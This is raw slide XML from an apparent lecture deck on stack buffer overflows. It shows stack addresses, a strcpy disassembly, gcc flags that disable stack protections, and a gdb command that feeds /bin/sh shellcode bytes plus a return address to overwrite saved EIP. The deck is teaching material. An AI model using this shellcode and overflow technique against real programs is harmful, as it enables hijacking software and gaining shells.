                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff666</a:t>
                      </a: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221</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101008" y="101067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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1435884030"/>
              </p:ext>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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0xbffff6a0</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0x0</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>b7e3faf3</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff698</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff65c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff660</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff666</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4787881" y="400875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3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="2001836"/>
            <a:ext cx="2831284" cy="734384"/>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shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="1857434"/>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0xbffff688</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813522393"/>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went wrong?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must overflow the saved EIP on the stack with the address of the shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The buffer we are writing to is at %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x32 (50) so we need</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>33 bytes of shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>17 random bytes (let’s just use ’a’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4 bytes for saved EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4 bytes for the address of the shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>222</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143267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marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -Wall -Wall -O0 -g -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-omit-frame-pointer -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-deprecated-declarations -D_FORTIFY_SOURCE=0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-pie -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-format -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-format-security -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>norelro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-protector -m32 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mpreferred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-boundary=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> '\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x86\xe5\x89\xc2\x0b\x01\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x80\x31\xc0\xb0\x01\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x80' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>17</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> * '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\xf6\x66'"`</a:t>
            </a:r>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223</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183796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932972828"/>
              </p:ext>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
